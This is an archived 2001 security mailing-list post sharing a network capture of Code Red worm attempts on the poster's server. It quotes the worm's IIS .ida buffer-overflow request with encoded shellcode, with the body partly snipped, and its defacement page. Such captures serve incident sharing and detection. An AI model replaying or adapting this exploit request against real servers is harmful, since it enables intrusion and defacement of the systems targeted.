Netcat Capture..

From: Ken Pfeil (Kenat_private)
Date: Wed Aug 01 2001 - 08:30:41 PDT

  • Next message: Kman: "Re: Code Red, anyone?"

    FYI,
    4 attempts in the last hour. (11:30am EST, GMT -0500).
    
    GET
    /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
    u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
    HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
     Accept: */*
    Content-length: 3569
    
    <Snip>
    
    Content-type: text/xml
    HOST:www.worm.com
     Accept: */*
    Content-length: 3569
    
     c:\notworm LMTH
    <html><head><meta http-equiv="Content-Type" content="text/html;
    charset=english"><title>HELLO!</title></head><bady><hr size=5><font
    color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked
    By Chinese!</font></hr></bady></html>
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 09:15:27 PDT